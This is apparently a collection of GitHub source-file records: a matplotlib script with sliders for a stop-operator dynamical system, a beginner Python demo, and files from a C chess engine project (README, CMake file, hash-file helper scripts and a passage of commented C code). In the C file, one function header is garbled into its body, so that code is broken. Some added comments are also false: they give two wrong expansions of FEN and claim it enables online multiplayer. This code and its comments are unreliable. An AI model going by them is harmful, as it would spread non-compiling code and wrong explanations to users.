fontsize=10,\n xycoords='axes fraction', textcoords='offset points',\n bbox=dict(facecolor='white', alpha=0.8),\n horizontalalignment='right', verticalalignment='top')\ntext = ax[0].text(solx[0], sols[0], '$s_0 = $' + str(round(arrayofs[0], 4)))\n\nax[0].margins(x=0)\nax[1].margins(x=0)\nax[0].set_xlabel('$x_1-x_2$', fontsize=15)\nax[0].set_ylabel('$H[x_1-x_2, s_0]$', rotation=0, fontsize=15)\nax[1].set_xlabel('$x_1$', fontsize=15)\nax[1].set_ylabel('$x_2$', rotation=0, fontsize=15)\nax[1].set_title('Projection on the phase plane ($x_1, x_2$)')\nax[0].set_xlim([-5, 5])\nax[0].set_ylim([-1.1, 1.1])\nax[0].set_title('Stop operator')\nax[0].yaxis.set_major_formatter(formatter)\nax[0].yaxis.set_label_coords(-0.15, 0.48)\nax[1].yaxis.set_label_coords(-0.1, 0.48)\nx1min = -2.5\nx1max = 2.5\nx2min = -2\nx2max = 2\nax[1].set_xlim([x1min, x1max])\nax[1].set_ylim([x2min, x2max])\nax[0].tick_params(axis=\"x\", labelsize=15)\nax[0].tick_params(axis=\"y\", labelsize=15)\nax[1].tick_params(axis=\"x\", labelsize=15)\nax[1].tick_params(axis=\"y\", labelsize=15)\nax[0].grid()\nax[1].grid()\n\naxcolor = 'lightgoldenrodyellow'\n\nsmallkval = plt.axes([0.2, 0.2, 0.65, 0.01], facecolor=axcolor)\nssmallkval = Slider(smallkval, '$k$', 0.001, 20.000, valinit=smallk, valstep=0.001)\n\nbigkval = plt.axes([0.2, 0.18, 0.65, 0.01], facecolor=axcolor)\nsbigkval = Slider(bigkval, '$K$', 0.000, 20.000, valinit=bigk, valstep=0.001)\n\nsval = plt.axes([0.2, 0.16, 0.65, 0.01], facecolor=axcolor)\nssval = Slider(sval, '$s_0$', -1, 1, valinit=arrayofs[0], valstep=0.01)\n\nx1val = plt.axes([0.2, 0.14, 0.65, 0.01], facecolor=axcolor)\nsx1val = Slider(x1val, '$x_{10}$', -10, 10, valinit=w0[0], valstep=0.01)\n\nx2val = plt.axes([0.2, 0.12, 0.65, 0.01], facecolor=axcolor)\nsx2val = Slider(x2val, '$x_{20}$', -10, 10, valinit=w0[1], valstep=0.01)\n\nx3val = plt.axes([0.2, 0.1, 0.65, 0.01], facecolor=axcolor)\nsx3val = Slider(x3val, '$x_{30}$', -10, 10, valinit=w0[2], valstep=0.01)\n\nx4val = plt.axes([0.2, 0.08, 0.65, 0.01], facecolor=axcolor)\nsx4val = Slider(x4val, '$x_{40}$', -10, 10, valinit=w0[3], valstep=0.01)\n\ndelval = plt.axes([0.2, 0.06, 0.65, 0.01], facecolor=axcolor)\nsdelval = Slider(delval, '$\\delta$', 0, 1, valinit=delta, valstep=0.01)\n\n#timeval = plt.axes([0.2, 0.04, 0.65, 0.01], facecolor=axcolor)\n#stimeval = Slider(timeval, 'Time', 0, 10000, valinit=stoptime, valstep=0.01)\n\n#numval = plt.axes([0.2, 0.02, 0.65, 0.01], facecolor=axcolor)\n#snumval = Slider(numval, 'Number of points', 0, 300000, valinit=numpoints, valstep=1)\n\nresetax = plt.axes([0.9, 0.01, 0.025, 0.02])\nbutton = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')\n\n\ndef update(val):\n\n global arrayofs\n global wpred\n global spred\n global txt\n global text\n spred = ssval.val\n arrayofs = [spred]\n\n w0 = [sx1val.val, sx2val.val, sx3val.val, sx4val.val]\n wpred = w0\n\n if ssval.val == 0:\n coeffs = [1, sdelval.val, 2 * ssmallkval.val, ssmallkval.val * sdelval.val, ssmallkval.val * sbigkval.val]\n eigs = np.roots(coeffs)\n else:\n coeffs = [1, sdelval.val, 2 * (ssmallkval.val + 1), (ssmallkval.val + 1) * sdelval.val,\n (ssmallkval.val + 1) * sbigkval.val]\n eigs = np.roots(coeffs)\n\n txt.remove()\n text.remove()\n cases = ['$k+1 < K$', '$k < K < k+1$', '$K < k$', '$K = k$', '$K = k + 1$']\n if sbigkval.val > ssmallkval.val + 1:\n case = cases[0]\n elif ssmallkval.val < sbigkval.val < ssmallkval.val + 1:\n case = cases[1]\n elif sbigkval.val < ssmallkval.val:\n case = cases[2]\n elif sbigkval.val == ssmallkval.val:\n case = cases[3]\n elif sbigkval.val == ssmallkval.val + 1:\n case = cases[4]\n\n signs = [' + ', ' ']\n if eigs[0].imag > 0:\n sign1 = signs[0]\n else:\n sign1 = signs[1]\n\n if eigs[1].imag > 0:\n sign2 = signs[0]\n else:\n sign2 = signs[1]\n\n if eigs[2].imag > 0:\n sign3 = signs[0]\n else:\n sign3 = signs[1]\n\n if eigs[3].imag > 0:\n sign4 = signs[0]\n else:\n sign4 = signs[1]\n\n spred = ssval.val\n arrayofs = [ssval.val]\n #stoptime = int(stimeval.val)\n #numpoints = snumval.val\n numpoints = stoptime * 50\n\n t = [stoptime * float(i) / float(numpoints - 1) for i in range(numpoints)]\n p = [ssmallkval.val, sbigkval.val, sdelval.val]\n wsol = syssolver(vectorfield, w0, t, p, (t[1] - t[0]) / 10.0)\n x1_sol = []\n x2_sol = []\n #x3_sol = []\n #x4_sol = []\n\n for n in range(len(t)):\n x1_sol.append(wsol[n][0])\n x2_sol.append(wsol[n][1])\n #x3_sol.append(wsol[n][2])\n #x4_sol.append(wsol[n][3])\n\n solx = []\n for i in range(0, len(wsol)):\n solx.append(wsol[i][0] - wsol[i][1])\n\n sols = [ssval.val]\n for i in range(0, len(wsol) - 1):\n sols.append(arrayofs[i])\n\n if np.sqrt(x1_sol[-1] ** 2 + x2_sol[-1] ** 2) > 5:\n limit_x1 = '$\\infty$'\n limit_x2 = '$\\infty$'\n else:\n limit_x1 = str(round(x1_sol[-1], 3))\n limit_x2 = str(round(x2_sol[-1], 3))\n #basin_x1 = []\n #basin_x2 = []\n #if np.sqrt((w0[0] - wsol[0][-1]) ** 2 + (w0[1] - wsol[1][-1]) ** 2) > 0.1:\n # print('attached')\n # basin_x1.append(w0[0])\n # basin_x2.append(w0[1])\n #with open('basin.txt', 'a') as f:\n #for item in basin_x1:\n # f.write(\"%s,\" % round(item, 3))\n #for item in basin_x2:\n # f.write(\"%s,\\r\" % round(item, 3))\n txt = ax[1].annotate('$\\delta$ = ' + str(round(sdelval.val, 2)) + '\\n'\n 'Init. condits.: (' + str(\n round(w0[0], 3)) + ', ' + str(\n round(w0[1], 3)) + ', ' + str(round(w0[2], 3)) + ', ' + str(round(w0[3], 3)) + ', $s_0:$ ' + str(\n round(ssval.val, 4)) + ')\\n'\n ' Eq. point: (' + str(\n round(-sols[-1] / float(ssmallkval.val),\n 3)) + ', 0, 0, 0)\\n' + 'Limit point: (' + limit_x1 + ', ' + limit_x2 + ', 0, 0)\\n' +\n 'k = ' + str(round(ssmallkval.val, 2)) + ', K = ' + str(round(sbigkval.val, 2)) + '\\n' +\n case + '\\n' +\n '$\\lambda_1 = $' + str(\n round(eigs[0].real, 2)) + sign1 + str(round(eigs[0].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_2 = $' + str(\n round(eigs[1].real, 2)) + sign2 + str(round(eigs[1].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_3 = $' + str(\n round(eigs[2].real, 2)) + sign3 + str(round(eigs[2].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_4 = $' + str(\n round(eigs[3].real, 2)) + sign4 + str(round(eigs[3].imag, 2)) + ' $\\cdot$ $i$', xy=(1, 1), xytext=(-15, -15),\n fontsize=10,\n xycoords='axes fraction', textcoords='offset points',\n bbox=dict(facecolor='white', alpha=0.8),\n horizontalalignment='right', verticalalignment='top')\n\n text = ax[0].text(solx[0], sols[0], '$s_0 = $' + str(round(ssval.val, 4)))\n eq1 = -sols[-1] / float(ssmallkval.val)\n ll = -1 / float(ssmallkval.val)\n rl = -ll\n\n l.set_xdata(solx)\n l.set_ydata(arrayofs)\n l1.set_xdata(solx[0])\n l1.set_ydata(sols[0])\n l2.set_xdata(x1_sol)\n l2.set_ydata(x2_sol)\n l4.set_xdata(eq1)\n l5.set_xdata(ll)\n l6.set_xdata(rl)\n l7.set_xdata(x1_sol[-1])\n l7.set_ydata(x2_sol[-2])\n l8.set_xdata(w0[0])\n l8.set_ydata(w0[1])\n fig.canvas.draw_idle()\n\n\nssmallkval.on_changed(update)\nsbigkval.on_changed(update)\nssval.on_changed(update)\nsdelval.on_changed(update)\nsx1val.on_changed(update)\nsx2val.on_changed(update)\nsx3val.on_changed(update)\nsx4val.on_changed(update)\n\n\n#stimeval.on_changed(update)\n#snumval.on_changed(update)\n\n\ndef reset(event):\n ssmallkval.reset()\n sbigkval.reset()\n ssval.reset()\n sdelval.reset()\n sx1val.reset()\n sx2val.reset()\n sx3val.reset()\n sx4val.reset()\n #stimeval.reset()\n # snumval.reset()\n\n\nbutton.on_clicked(reset)\n\nplt.show()\n" } ]
2
silviajin0422/Math510.Python
https://github.com/silviajin0422/Math510.Python
e12a070acf0f12b1accc2106579381ad49bb3567
46d1b417bfbf4457de5fcccc2a165a9a4c35552e
31470587e37f233d1130a8e865b1a4008c2500db
refs/heads/master
2016-09-17T20:14:04.959750
2016-09-08T02:15:39
2016-09-08T02:15:39
67,656,783
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5224839448928833, "alphanum_fraction": 0.5524625182151794, "avg_line_length": 14.080645561218262, "blob_id": "223eac698cc75097d4645f030807dfb5b83ce230", "content_id": "2ccfb5270279d2e83c88d985ffd98411614ac997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 59, "num_lines": 62, "path": "/demo1.py", "repo_name": "silviajin0422/Math510.Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nx = 2+3\n\nprint(x)\n\ny = 6\n\nz = x + y\n\nprint(z)\nprint(x+y)\n\ny = -4\nif y ==1:\n print('y still equals 1, I was just checking')\n \nif y < 1:\n print('What now?')\n \nif y <=1:\n print('Did this work?')\n \na = 6\nif a > 5:\n print(\"This shouldn't happen.\")\nelse:\n print(\"This should happen.\")\n \nif a > 5:\n print(\"Big number!\")\nelif a %2 !=0:\n print(\"This is an odd number\")\n print(\"It isn't greater than five, either\")\nelse:\n print(\"this number isn't greater than 5\")\n print(\"nor is it odd\")\n print(\"feeling special?\")\n \nlist = [2, 4, 6, 8]\nsum=0\nfor num in list:\n sum = sum + num\n print(num,sum)\nprint(\"the sum is:\", sum)\n\na = 0\nwhile a<10:\n a = a + 1\n print(a)\n\nx = 10\nwhile x > 0:\n print(x)\n x = x - 1\n print(\"wow, we've counted x down, and now it equals\",x)\nprint(\"And now the loop has ended.\")" } ]
1
NoraQuick/fast-chess
https://github.com/NoraQuick/fast-chess
124d66ebcb3cc2316d582237abcdeb71fc1afdd6
86795bc948fedf68b783e7038650968fd2d1dfff
ba0edc81342dde532a992e35dd8f9152503f1376
refs/heads/master
2020-12-11T16:36:39.788792
2020-03-17T06:58:26
2020-03-17T06:58:26
233,898,545
2
1
MIT
2020-01-14T17:36:23
2020-03-17T06:58:08
2020-03-17T06:58:27
C
[ { "alpha_fraction": 0.5550805926322937, "alphanum_fraction": 0.5600131750106812, "avg_line_length": 34.36046600341797, "blob_id": "6b69d3c05e497aaac0d12eadbbfaea61731ede3e", "content_id": "a57afb11b526741a1449ae47b3063687a7f11144", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3045, "license_type": "permissive", "max_line_length": 267, "num_lines": 86, "path": "/README.md", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "# fast-chess\n\n[![Build Status](https://travis-ci.org/fredericojordan/fast-chess.svg?branch=master)](https://travis-ci.org/fredericojordan/fast-chess) [![CircleCI](https://circleci.com/gh/fredericojordan/fast-chess.svg?style=svg)](https://circleci.com/gh/fredericojordan/fast-chess)\n\n![fast-chess](http://i.imgur.com/O6rcSqu.png)\n\nSimple chess game intended to be faster than my (now abandoned) [python version](https://github.com/fredericojordan/chess), hence the name.\n\nMany thanks to [Chess Programming Wiki](http://chessprogramming.wikispaces.com) and [TSCP](http://www.tckerrigan.com/Chess/TSCP/) for some ideas and tuning values.\n\n## Features\n\n- Board Representation:\n - Bitboards\n- Search:\n - Iterative Deepening\n - Alpha-Beta Pruning\n - Parallel Processing\n - Quiescence Search\n - Static Exchange Evaluation\n- Evaluation:\n - Material Balance\n - Piece-Square Tables\n - Pawn Structure\n- Graphical User Interface:\n - Attack Heatmap\n - Edit Board Mode\n\n## Quickstart\n\n1. Download [latest release](https://github.com/fredericojordan/fast-chess/releases)\n2. Extract file contents\n3. Run `chess.exe` (Windows) or `./chess` (macOS/Linux)\n4. ???\n5. Profit\n\n## GUI Hotkeys\n\n| Hotkey | Usage |\n| :---------: | --------------------------------------------------- |\n| **▲ / ▼** | Increase/decrease AI search depth |\n| **A** | Toggle [A]I opponent |\n| **I** | [I]nvert player's colors |\n| **H** | Toggle attack [H]eatmap |\n| **C** | Change board [c]olor scheme |\n| **R** | [R]andom board color |\n| **T** | Random [t]inted board color |\n| **E** | [E]dit mode (drag to move or click to cycle pieces) |\n| **P** | Export to [P]GN |\n| **D** | [D]ump game info to file |\n| **M** | List legal [M]oves (console mode only) |\n| **V** | Static board e[v]aluation (console mode only) |\n| **Q** | [Q]uit |\n| **U** | [U]ndo move |\n\n## Screenshots\n\n![Chess Heatmap](http://i.imgur.com/qvwbINN.png)\n\n## Building the project\n\n### macOS/Linux\n\nIn order to successfully build the project we need a C++ compiler, [CMake](https://cmake.org/) and also the [SDL](https://www.libsdl.org/) graphics libraries: `SDL2`, `SDL2_image` and `SDL2_ttf`.\n\nIn Debian/Ubuntu, this can be achieved by running the command:\n\n```bash\napt-get install -y g++ cmake libsdl2-dev libsdl2-image-dev libsdl2-ttf-dev\n```\n\nIn macOS, we can run:\n\n```bash\nbrew install cmake sdl2 sdl2_image sdl2_ttf\n```\n\nThen we just download the code, build the project and run the program:\n\n```bash\ngit clone https://github.com/fredericojordan/fast-chess.git\ncd fast-chess\ncmake .\nmake\n./chess\n```\n" }, { "alpha_fraction": 0.7455968856811523, "alphanum_fraction": 0.7632094025611877, "avg_line_length": 27.44444465637207, "blob_id": "f79bac27ccba8bbf9479029a605addec40322faa", "content_id": "c5d719ff31da6f2f3cd162cb5abd30c85821ba8f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 511, "license_type": "permissive", "max_line_length": 67, "num_lines": 18, "path": "/CMakeLists.txt", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "CMAKE_MINIMUM_REQUIRED(VERSION 3.10)\n\nSET( CMAKE_MODULE_PATH\n\t\"${CMAKE_CURRENT_SOURCE_DIR}/cmake\"\n\t)\n\nfind_package(SDL2 REQUIRED)\nfind_package(SDL2_image REQUIRED)\nfind_package(SDL2_ttf REQUIRED)\n\ninclude_directories(${CMAKE_CURRENT_SOURCE_DIR}/include)\n\nFILE(GLOB_RECURSE includes ${CMAKE_CURRENT_SOURCE_DIR}/include/*.h)\nFILE(GLOB_RECURSE sources ${CMAKE_CURRENT_SOURCE_DIR}/src/*.c)\n\nadd_executable(chess ${sources})\ntarget_link_libraries(chess ${SDL2_LIBRARY} ${SDL2_IMAGE_LIBRARIES}\n\t${SDL2_TTF_LIBRARIES})" }, { "alpha_fraction": 0.43223685026168823, "alphanum_fraction": 0.44736841320991516, "avg_line_length": 28.440000534057617, "blob_id": "e0704f578881d309dd1fc32825528e19b14f83b9", "content_id": "28a49b15614fe629f0314a10d420443d1ace3596", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "permissive", "max_line_length": 126, "num_lines": 50, "path": "/scripts/hashfileSanitize.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r+')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n content = {}\r\n \r\n line_number = 0\r\n for line in hashfile.readlines():\r\n line_number += 1\r\n entry = line.strip().split()\r\n \r\n if len(entry) < 7:\r\n print('Bad entry on line ' + str(line_number) + ' (ignored): ' + line.strip())\r\n continue\r\n \r\n hash = entry[0]\r\n depth = int(entry[1])\r\n score = int(entry[2])\r\n fen = ' '.join(entry[3:])\r\n \r\n if hash in content:\r\n old_entry = content[hash].split()\r\n old_depth = int(old_entry[1]) \r\n old_fen = ' '.join(old_entry[3:]) \r\n \r\n if fen == old_fen:\r\n if depth > old_depth:\r\n content[hash] = line\r\n else:\r\n print('Colision!')\r\n print(content[hash].strip())\r\n print(line.strip())\r\n sys.exit(-1)\r\n else:\r\n content[hash] = line\r\n \r\n hashfile.seek(0)\r\n hashfile.truncate()\r\n \r\n for entry in sorted(content.items(), key=lambda x: x[0]):\r\n field = entry[1].split()\r\n sanitized_str = '{} {} {} {} {} {} {}\\n'.format(field[0], field[1], field[2], field[3], field[4], field[5], field[6]) \r\n hashfile.write(sanitized_str)\r\n \r\n hashfile.close()\r\n print('Done!')" }, { "alpha_fraction": 0.4613526463508606, "alphanum_fraction": 0.49033817648887634, "avg_line_length": 22.47058868408203, "blob_id": "52f17093673035688418f12cf1fdcda0f3e8f493", "content_id": "496523972823322015116e6b0fb873358350b87e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "permissive", "max_line_length": 54, "num_lines": 17, "path": "/scripts/hash.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\ndef hash(input):\r\n hash = 5381;\r\n\r\n for c in input:\r\n hash = ((hash << 5) + hash) + ord(c);\r\n hash &= 0xffffffff\r\n\r\n return format(hash, '08x')\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) < 2:\r\n print('Please type input and press [ENTER].')\r\n print('Hash: ' + hash(input()))\r\n else:\r\n print('Hash: ' + hash(' '.join(sys.argv[1:])))" }, { "alpha_fraction": 0.5334873199462891, "alphanum_fraction": 0.5542725324630737, "avg_line_length": 22.16666603088379, "blob_id": "7bde30c89a7a1eb6d98d1177fc3f2ce64e1dd0a4", "content_id": "a28b88038e43b9d85a935805e29bd1fe5601ed12", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "permissive", "max_line_length": 72, "num_lines": 18, "path": "/scripts/hashfileDecompress.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r+')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n \r\n content = hashfile.read()\r\n content = zlib.decompress(base64.b64decode(content)).decode(\"utf-8\")\r\n \r\n hashfile.seek(0)\r\n hashfile.truncate()\r\n hashfile.write(content)\r\n hashfile.close()\r\n \r\n print('Done!')" }, { "alpha_fraction": 0.421286016702652, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 23.11111068725586, "blob_id": "45111a6658b80de0ca9bcd0bdcf75a89c4fa8d82", "content_id": "1f881fa40c6f74d2c926ffb2a9de611376d0dc39", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 902, "license_type": "permissive", "max_line_length": 90, "num_lines": 36, "path": "/scripts/hashfileStats.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nMAX_DEPTH = 50\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n \r\n line_number = 0\r\n depths = [0 for _ in range(MAX_DEPTH)]\r\n \r\n for line in hashfile.readlines():\r\n line_number += 1\r\n l = line.strip().split()\r\n \r\n if len(l) < 7:\r\n print('Bad entry on line ' + str(line_number) + ' (ignored): ' + line.strip())\r\n continue\r\n \r\n hash = l[0]\r\n depth = int(l[1])\r\n score = int(l[2])\r\n fen = ' '.join(l[3:])\r\n \r\n depths[depth] += 1\r\n \r\n hashfile.close()\r\n print('-- Depths --')\r\n for i in range(MAX_DEPTH):\r\n if not depths[i]:\r\n continue\r\n print('{:2d}: {:8d}'.format(i, depths[i]))\r\n print('------------')" }, { "alpha_fraction": 0.6487943530082703, "alphanum_fraction": 0.6630102396011353, "avg_line_length": 29.839502334594727, "blob_id": "46f9d3c8ce03d6df642df0f9d746172820747f9c", "content_id": "94a7c0dac4f2d5833cecd06e7fdaf4f03dc9ff29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 101647, "license_type": "permissive", "max_line_length": 174, "num_lines": 3296, "path": "/src/added parts fast-chess.c", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\n ============================================================================\n Name : fast-chess.c\n Author : Frederico Jordan <fredericojordan@gmail.com>\n Version :\n Copyright : Copyright (c) 2016 Frederico Jordan\n Description : Simple chess game!\n ============================================================================\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <time.h>\n#include <ctype.h>\n\n#include \"fast-chess.h\"\n\nchar FILES[8] = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h'};\nchar RANKS[8] = {'1', '2', '3', '4', '5', '6', '7', '8'};\n\n//declaring a bit array data structure.\nBitboard FILES_BB[8] = { FILE_A, FILE_B, FILE_C, FILE_D, FILE_E, FILE_F, FILE_G, FILE_H };\nBitboard RANKS_BB[8] = { RANK_1, RANK_2, RANK_3, RANK_4, RANK_5, RANK_6, RANK_7, RANK_8 };\n\n//declaring the starting position. FEN ~ stands for Extended Position Description\nchar INITIAL_FEN[] = \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\";\n\n//initializing the board and the Chess pieces \nint INITIAL_BOARD[NUM_SQUARES] = { WHITE|ROOK, WHITE|KNIGHT, WHITE|BISHOP, WHITE|QUEEN, WHITE|KING, WHITE|BISHOP, WHITE|KNIGHT, WHITE|ROOK,\n WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN,\n BLACK|ROOK, BLACK|KNIGHT, BLACK|BISHOP, BLACK|QUEEN, BLACK|KING, BLACK|BISHOP, BLACK|KNIGHT, BLACK|ROOK };\n\nint PIECE_VALUES[] = { 0, 100, 300, 310, 500, 900, 42000 };\n\n//Initializing Pawn Bonus\nint PAWN_BONUS[] = {0, 0, 0, 0, 0, 0, 0, 0,\n\t\t\t\t\t0, 0, 0, -40, -40, 0, 0, 0,\n\t\t\t\t\t1, 2, 3, -10, -10, 3, 2, 1,\n\t\t\t\t\t2, 4, 6, 8, 8, 6, 4, 2,\n\t\t\t\t\t3, 6, 9, 12, 12, 9, 6, 3,\n\t\t\t\t\t4, 8, 12, 16, 16, 12, 8, 4,\n\t\t\t\t\t5, 10, 15, 20, 20, 15, 10, 5,\n\t\t\t\t\t0, 0, 0, 0, 0, 0, 0, 0};\n//Initializing Knight Bonus\nint KNIGHT_BONUS[] = {-10, -30, -10, -10, -10, -10, -30, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, -10, -10, -10, -10, -10, -10, -10};\n//Initializing Bishop Bonus\nint BISHOP_BONUS[] = {-10, -10, -20, -10, -10, -20, -10, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, -10, -10, -10, -10, -10, -10, -10};\n//Initializing King Bonus\nint KING_BONUS[] = { 0, 20, 40, -20, 0, -20, 40, 20,\n\t\t\t\t -20, -20, -20, -20, -20, -20, -20, -20,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40};\n//Initializing Knight End game Bonus\nint KING_ENDGAME_BONUS[] = { 0, 10, 20, 30, 30, 20, 10, 0,\n\t\t\t\t\t\t\t10, 20, 30, 40, 40, 30, 20, 10,\n\t\t\t\t\t\t\t20, 30, 40, 50, 50, 40, 30, 20,\n\t\t\t\t\t\t\t30, 40, 50, 60, 60, 50, 40, 30,\n\t\t\t\t\t\t\t30, 40, 50, 60, 60, 50, 40, 30,\n\t\t\t\t\t\t\t20, 30, 40, 50, 50, 40, 30, 20,\n\t\t\t\t\t\t\t10, 20, 30, 40, 40, 30, 20, 10,\n\t\t\t\t\t\t\t 0, 10, 20, 30, 30, 20, 10, 0};\n//Initializing Flip Vertical\nint FLIP_VERTICAL[] = {56, 57, 58, 59, 60, 61, 62, 63,\n\t\t\t 48, 49, 50, 51, 52, 53, 54, 55,\n\t\t\t 40, 41, 42, 43, 44, 45, 46, 47,\n\t\t\t 32, 33, 34, 35, 36, 37, 38, 39,\n\t\t\t 24, 25, 26, 27, 28, 29, 30, 31,\n\t\t\t 16, 17, 18, 19, 20, 21, 22, 23,\n\t\t\t 8, 9, 10, 11, 12, 13, 14, 15,\n\t\t\t 0, 1, 2, 3, 4, 5, 6, 7};\n\n//This function will initialize the start of the game and copy data from source to destination\n\tvoid getInitialGame(Game * game) {\n\tmemcpy(game->position.board, INITIAL_BOARD, sizeof(game->position.board));\n\tgame->position.toMove = WHITE;\n\tgame->position.epSquare = -1;\n\tgame->position.castlingRights = CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE|CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK;\n\tgame->position.halfmoveClock = 0;\n\tgame->position.fullmoveNumber = 1;\n\n\tgame->moveListLen = 0;\n\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\tmemset(game->positionHistory, 0, MAX_PLYS_PER_GAME*MAX_FEN_LEN*sizeof(char));\n\tmemcpy(game->positionHistory[0], INITIAL_FEN, sizeof(INITIAL_FEN));\n}\n\n//Fen stands for FenForge.\n//This function is used to allow an online multiplayer\nvoid getFenGamec\n\tgame->moveListLen = 0;\n\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\tmemset(game->positionHistory, 0, MAX_PLYS_PER_GAME*MAX_FEN_LEN*sizeof(char));\n\tmemcpy(game->positionHistory[0], fen, fenLen);\n}\n\n//This function will load the info about an online player\nint loadFen(Position * position, char fen[]) {\n\t// ===== BOARD =====\n\tmemset(position->board, EMPTY, sizeof(position->board));\n//This is the starting position\n\tint rank = 7;\n\tint boardPos = rank*8; // the board of the Position\n\tchar * charPos = fen;\n\n\tchar pieceCode = *(charPos);\n//loop for getting all the pieces until end \n\twhile(pieceCode != ' ') {\n\t\tif (pieceCode == '/') {\n\t\t\trank--;\n\t\t\tboardPos = rank*8;\n\t\t} else if (isdigit(pieceCode)) {\n\t\t\tint emptySquares = atoi(charPos);\n\t\t\tboardPos += emptySquares;\n\t\t} else {\n\t\t\tposition->board[boardPos++] = char2piece(pieceCode);\n\t\t}\n\n\t\tpieceCode = *(++charPos);\n\t}\n\n\n\t// ===== TO MOVE =====\n\tchar *nextFenField = strchr(fen, ' ') + 1;\n//the team movement turns \n\tif (*nextFenField == 'b') {\n\t\tposition->toMove = BLACK;\n\t} else {\n\t\tposition->toMove = WHITE;\n\t}\n\n\t// ===== CASTLING RIGHTS =====\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n\tposition->castlingRights = 0;\n\tif (strchr(nextFenField, 'K'))\n\t\tposition->castlingRights |= CASTLE_KINGSIDE_WHITE;\n\tif (strchr(nextFenField, 'Q'))\n\t\tposition->castlingRights |= CASTLE_QUEENSIDE_WHITE;\n\tif (strchr(nextFenField, 'k'))\n\t\tposition->castlingRights |= CASTLE_KINGSIDE_BLACK;\n\tif (strchr(nextFenField, 'q'))\n\t\tposition->castlingRights |= CASTLE_QUEENSIDE_BLACK;\n\n\t// ===== EN PASSANT =====\n\tnextFenField = 